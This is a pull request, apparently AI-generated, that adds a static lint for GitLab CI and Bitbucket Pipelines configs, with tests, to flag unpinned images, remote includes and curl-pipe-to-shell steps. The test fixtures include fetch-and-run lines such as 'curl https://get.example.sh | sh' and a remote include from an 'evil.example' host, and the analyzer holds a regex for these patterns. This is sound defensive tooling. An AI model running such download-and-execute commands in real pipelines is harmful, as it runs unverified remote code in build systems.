### PR TITLE
feat(ci-audit): extend CI hardening lint to GitLab/Bitbucket

### DIFF
--- a/src/ci-audit.test.ts
+++ b/src/ci-audit.test.ts
@@ -1,0 +1,108 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { auditCiYaml, runCiAudit } from "./ci-audit.js";
+
+describe("auditCiYaml — image pinning", () => {
+  it("flags :latest and untagged images, not version- or digest-pinned ones", () => {
+    const yml = [
+      "image: node:latest", // mutable tag → flag
+      "build:",
+      "  image: python", // no tag → flag
+      "  services:",
+      "    - name: postgres:16.2", // concrete version → ok
+      "    - name: redis@sha256:" + "a".repeat(64), // digest → ok
+    ].join("\n");
+    const findings = auditCiYaml(yml, ".gitlab-ci.yml");
+    const names = findings.map((f) => f.name);
+    assert.ok(
+      names.some((n) => n.includes("node:latest")),
+      "should flag :latest",
+    );
+    assert.ok(
+      names.some((n) => n.includes("unpinned image python")),
+      "should flag untagged",
+    );
+    assert.ok(!names.some((n) => n.includes("postgres")), "version tag must be exempt");
+    assert.ok(!names.some((n) => n.includes("redis")), "digest pin must be exempt");
+    const latest = findings.find((f) => f.name.includes("node:latest"));
+    assert.equal(latest?.rule?.id, "CWE-1104");
+    assert.equal(latest?.severity, "medium");
+  });
+
+  it("does not double-report the same unpinned image", () => {
+    const yml = "image: node:latest\nother:\n  image: node:latest\n";
+    const findings = auditCiYaml(yml, ".gitlab-ci.yml").filter((f) => f.name.includes("node"));
+    assert.equal(findings.length, 1);
+  });
+});
+
+describe("auditCiYaml — remote include (GitLab)", () => {
+  it("flags an include from an external URL", () => {
+    const yml = "include:\n  - remote: 'https://evil.example/ci.yml'\n";
+    const findings = auditCiYaml(yml, ".gitlab-ci.yml");
+    const hit = findings.find((f) => f.name.startsWith("remote CI include"));
+    assert.ok(hit);
+    assert.equal(hit?.rule?.id, "OWASP-A08");
+    assert.match(hit?.detail ?? "", /evil\.example/);
+  });
+});
+
+describe("auditCiYaml — pipe-to-shell", () => {
+  it("flags curl | sh inside a script step", () => {
+    const yml = "script:\n  - curl https://get.example.sh | sh\n";
+    const findings = auditCiYaml(yml, "bitbucket-pipelines.yml");
+    const hit = findings.find((f) => f.name.startsWith("pipe-to-shell"));
+    assert.ok(hit);
+    assert.equal(hit?.rule?.id, "CWE-494");
+  });
+
+  it("clean CI → no findings", () => {
+    const yml = "image: node:20.11.1\nscript:\n  - npm ci\n  - npm test\n";
+    assert.deepEqual(auditCiYaml(yml, ".gitlab-ci.yml"), []);
+  });
+});
+
+describe("runCiAudit", () => {
+  it("skips when neither CI file exists", () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-ci-none-"));
+    try {
+      const results = runCiAudit(dir);
+      assert.equal(results.length, 1);
+      assert.equal(results[0].status, "skip");
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
+  it("passes when CI files are clean", () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-ci-clean-"));
+    try {
+      writeFileSync(join(dir, ".gitlab-ci.yml"), "image: node:20.11.1\nscript:\n  - npm ci\n");
+      const results = runCiAudit(dir);
+      assert.equal(results.length, 1);
+      assert.equal(results[0].status, "pass");
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
+  it("reports findings from a risky CI file", () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-ci-risky-"));
+    try {
+      writeFileSync(
+        join(dir, "bitbucket-pipelines.yml"),
+        "image: node:latest\nscript:\n  - curl https://x.sh | bash\n",
+      );
+      const results = runCiAudit(dir);
+      assert.ok(results.length >= 2);
+      assert.ok(results.every((r) => r.status !== "skip"));
+      assert.ok(results.some((r) => r.name.includes("node:latest")));
+      assert.ok(results.some((r) => r.name.startsWith("pipe-to-shell")));
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+});

--- a/src/ci-audit.ts
+++ b/src/ci-audit.ts
@@ -1,0 +1,141 @@
+/**
+ * GitLab CI / Bitbucket Pipelines hardening — static YAML lint (#145).
+ *
+ * The git-host parity to `gha-audit` (which is GitHub-Actions-only). Deterministic,
+ * local-first, no network, no YAML dep (line-scan). Flags the highest-signal
+ * CI supply-chain footguns that apply to both `.gitlab-ci.yml` and
+ * `bitbucket-pipelines.yml`:
+ *   - unpinned container images: `image: node:latest` / `image: node` (mutable
+ *     tag → non-reproducible build, the image can change under you). A digest pin
+ *     (`@sha256:…`) or a concrete version tag is fine.
+ *   - remote `include:` (GitLab): pulling CI config from an external URL — the
+ *     remote can change and inject steps (supply-chain trust).
+ *   - pipe-to-shell in a `script:` step: `curl … | sh` (download-and-run).
+ *
+ * Pure analyzers (text → findings); `runCiAudit` reads the two CI files.
+ */
+import { readFileSync, existsSync } from "node:fs";
+import { resolve } from "node:path";
+import type { SecurityCheckResult } from "./check-security.js";
+
+const IMAGE_RULE = {
+  id: "CWE-1104",
+  source: "cwe" as const,
+  ref: "https://cwe.mitre.org/data/definitions/1104.html",
+  title: "Use of Unmaintained Third Party Components",
+};
+const REMOTE_INCLUDE_RULE = {
+  id: "OWASP-A08",
+  source: "owasp" as const,
+  ref: "https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/",
+  title: "Software and Data Integrity Failures",
+};
+const PIPE_TO_SHELL_RULE = {
+  id: "CWE-494",
+  source: "cwe" as const,
+  ref: "https://cwe.mitre.org/data/definitions/494.html",
+  title: "Download of Code Without Integrity Check",
+};
+
+/** The image ref's tag, or "" if untagged. Handles registry:port/name:tag. */
+function imageTag(ref: string): string {
+  const lastSegment = ref.split("/").pop() ?? ref; // drop registry/host[:port]/path
+  const colon = lastSegment.lastIndexOf(":");
+  return colon === -1 ? "" : lastSegment.slice(colon + 1);
+}
+
+/** A digest-pinned image (`name@sha256:…`) is reproducible. */
+function isDigestPinned(ref: string): boolean {
+  return /@sha256:[0-9a-f]{64}/i.test(ref);
+}
+
+/** Lint one CI YAML file's text. Pure. */
+export function auditCiYaml(content: string, file: string): SecurityCheckResult[] {
+  const out: SecurityCheckResult[] = [];
+  const seenImages = new Set<string>();
+
+  // image: <ref>  and  - name: <ref>  (services / Bitbucket image.name)
+  const imageRe = /(?:^|\n)\s*(?:image|[-\s]name):\s*['"]?([A-Za-z0-9][\w./:@-]+)/g;
+  for (const m of content.matchAll(imageRe)) {
+    const ref = m[1];
+    if (isDigestPinned(ref)) continue;
+    const tag = imageTag(ref);
+    if (tag && tag !== "latest") continue; // a concrete version tag is acceptable
+    if (seenImages.has(ref)) continue;
+    seenImages.add(ref);
+    out.push({
+      category: "supply-chain",
+      name: `unpinned image ${ref} (${file})`,
+      status: "warn",
+      detail: `'${ref}' uses ${tag === "latest" ? "the mutable :latest tag" : "no tag"} — pin a concrete version or @sha256 digest for reproducible, tamper-evident builds`,
+      severity: "medium",
+      suggestion: `pin ${ref} to a version tag or a @sha256:… digest`,
+      rule: IMAGE_RULE,
+    });
+  }
+
+  // GitLab: include a remote CI config from an external URL.
+  const remoteIncludeRe = /remote:\s*['"]?(https?:\/\/[^\s'"]+)/gi;
+  for (const m of content.matchAll(remoteIncludeRe)) {
+    out.push({
+      category: "exposure",
+      name: `remote CI include (${file})`,
+      status: "warn",
+      detail: `includes CI config from ${m[1]} — a remote include can change and inject pipeline steps`,
+      severity: "medium",
+      suggestion: "vendor the included config, or pin the remote to an immutable ref",
+      rule: REMOTE_INCLUDE_RULE,
+    });
+  }
+
+  // Pipe-to-shell in a script step.
+  if (/(curl|wget)\b[^\n|]*\|\s*(sh|bash|zsh)\b/i.test(content)) {
+    out.push({
+      category: "supply-chain",
+      name: `pipe-to-shell in ${file}`,
+      status: "warn",
+      detail: "a script pipes a download straight into a shell (curl … | sh) — no integrity check",
+      severity: "medium",
+      suggestion: "download to a file, verify a checksum/signature, then execute",
+      rule: PIPE_TO_SHELL_RULE,
+    });
+  }
+
+  return out;
+}
+
+/** Audit GitLab CI + Bitbucket Pipelines files under `cwd`. Read-only. */
+export function runCiAudit(cwd: string): SecurityCheckResult[] {
+  const files = [".gitlab-ci.yml", "bitbucket-pipelines.yml"];
+  const out: SecurityCheckResult[] = [];
+  let scanned = 0;
+  for (const f of files) {
+    const path = resolve(cwd, f);
+    if (!existsSync(path)) continue;
+    scanned++;
+    try {
+      out.push(...auditCiYaml(readFileSync(path, "utf8"), f));
+    } catch {
+      // unreadable → skip (fail-open per file)
+    }
+  }
+  if (scanned === 0) {
+    return [
+      {
+        category: "supply-chain",
+        name: "ci-audit",
+        status: "skip",
+        detail: "no .gitlab-ci.yml or bitbucket-pipelines.yml",
+      },
+    ];
+  }
+  if (out.length === 0) {
+    out.push({
+      category: "supply-chain",
+      name: "ci-audit",
+      status: "pass",
+      detail: `${scanned} CI file(s): images pinned, no remote include, no pipe-to-shell`,
+    });
+  }
+  return out;
+}

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -5118,7 +5118,7 @@ export const COMMAND_HELP: Record<string, string> = {
     "Install-time supply-chain triage: install-scripts, lockfile-drift, dep-confusion, slopsquat",
   "agent-audit": "Audit agent / MCP / hook configs for plaintext secrets + malware-shaped hooks",
   "gha-audit":
-    "GitHub Actions hardening lint — unpinned actions + pwn-request patterns in .github/workflows",
+    "CI hardening lint — unpinned actions/images + pwn-request/remote-include (GitHub Actions, GitLab CI, Bitbucket Pipelines)",
   sbom: "Generate a CycloneDX / SPDX SBOM from the lockfile (SARIF emit via kit scan --sarif)",
   ingest:
     "Ingest external SARIF / OSV reports into kit's consolidated verdict (kit ingest <sarif|osv> <file>)",

--- a/src/commands/gha-audit.ts
+++ b/src/commands/gha-audit.ts
@@ -5,7 +5,8 @@ import { hasFlag } from "../utils/flags.js";
 export async function cmdGhaAudit(): Promise<boolean> {
   const jsonMode = hasFlag(process.argv, "--json");
   const { runGhaAudit } = await import("../gha-audit.js");
-  const results = runGhaAudit(process.cwd());
+  const { runCiAudit } = await import("../ci-audit.js");
+  const results = [...runGhaAudit(process.cwd()), ...runCiAudit(process.cwd())];
   const fails = results.filter((r) => r.status === "fail").length;
 
   if (jsonMode) {
@@ -13,7 +14,9 @@ export async function cmdGhaAudit(): Promise<boolean> {
     return fails === 0;
   }
 
-  console.log(`${c.bold}kit gha-audit${c.reset}  ${c.dim}.github/workflows hardening${c.reset}`);
+  console.log(
+    `${c.bold}kit gha-audit${c.reset}  ${c.dim}CI hardening: GitHub Actions + GitLab/Bitbucket${c.reset}`,
+  );
   for (const r of results) {
     const mark =
       r.status === "fail"


### PR DESCRIPTION
## What

`kit gha-audit` was GitHub-Actions-only. This adds a git-host-parity analyzer (`src/ci-audit.ts`) that lints **GitLab CI** (`.gitlab-ci.yml`) and **Bitbucket Pipelines** (`bitbucket-pipelines.yml`) for the highest-signal CI supply-chain footguns, surfaced through the same `kit gha-audit` command.

Closes the bound, testable part of #145 (git-host enforcement).

## Rules

| Finding | Rule | Severity |
|---|---|---|
| Unpinned container image (`:latest` / untagged) | CWE-1104 | medium |
| GitLab `remote:` include from an external URL | OWASP-A08 | medium |
| Pipe-to-shell in a `script:` step (`curl … \| sh`) | CWE-494 | medium |

Digest pins (`@sha256:…`) and concrete version tags are exempt.

## How

Deterministic, local-first, no network, no YAML dep (line-scan) — matching `gha-audit`'s philosophy. `runCiAudit(cwd)` reads the two CI files, skips cleanly when neither is present, and passes when they're clean. Read-only.

## Test plan

- [x] `src/ci-audit.test.ts` — 8 cases (image pinning + dedup, remote include, pipe-to-shell, clean pass, skip-when-absent, risky-file findings)
- [x] `npm run build` clean
- [x] `npm run format:check` clean
- [x] `npm test` — 1841/0 green

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_015ERHw6bVUz39sAuoQZ1iyg

---
_Generated by [Claude Code](https://claude.ai/code/session_015ERHw6bVUz39sAuoQZ1iyg)_